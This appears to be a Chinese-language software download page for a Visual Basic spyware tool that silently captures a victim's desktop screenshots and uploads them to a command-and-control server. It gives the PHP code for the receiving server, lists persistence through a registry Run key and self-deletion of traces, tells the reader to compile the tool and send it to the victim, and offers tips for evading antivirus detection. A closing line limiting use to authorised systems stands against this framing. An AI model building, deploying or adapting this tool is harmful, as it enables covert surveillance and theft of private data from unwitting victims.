首頁>編程相關>Visual Basic
下載

靜默截圖|攻擊後有效負載 |網路

一個簡單的負載,用於截取受害者桌面的螢幕截圖並將其上傳到 C&C。

特徵:

  • 持久(使用註冊表運行鍵)
  • 在背景運行
  • 更少的程式碼、更少的錯誤和更少的檢測;)
  • 將螢幕截圖上傳到 C&C 後從磁碟中刪除
  • Base64 的 C&C 伺服器
  • 在 C&C 上以有組織的方式上傳螢幕截圖
  • 無需連接埠轉送!使用單一 php 文件
  • [TODO] 機器訊息
  • [待辦事項] 加密
  • [TODO] 從 C&C 遠端設定間隔

安裝與使用:

  • 克隆這個儲存庫。
  • 我推薦的虛擬主機 namecheap
  • 前往您的 public_html 資料夾並建立新的 PHP 檔案並將以下程式碼放入其中
 <?php
$del = $_GET["dellog"];
$folder = $_GET["folder"];
mkdir($folder,0777);
$file = $_GET["path"];
if (!empty($_FILES["file"])){
move_uploaded_file($_FILES["file"]["tmp_name"],
      $file . "/" . $_FILES["file"]["name"]);
}
unlink($del);
?>
  • 在 Visual Studio 中開啟專案並編輯原始程式碼中的以下變數
 Dim server As String = BaseDecode1("your server address here in base64 encoded")
  • 並在下面編輯此變量
 Dim php As String = "yourphpfilename.php?" & "folder="
  • 只需編譯它並將其發送給受害者即可!

百萬美元的建議;)

避免防毒檢測

  • 更改應用程式圖標
  • 產生新的 GUID
  • 更改所有變數
  • 使用 Obfuscar 混淆代碼
  • 更改程序集資訊

捐款:

如果這個工具對您有用,請隨時給我買杯咖啡來感謝我:)

免責聲明:

該工具只能在授權系統上使用。未經明確許可,任何未經授權使用此工具的行為都是非法的。

執照:

GNU 通用公共授權

展開
附加信息
相關應用
爲您推薦
相關資訊 全部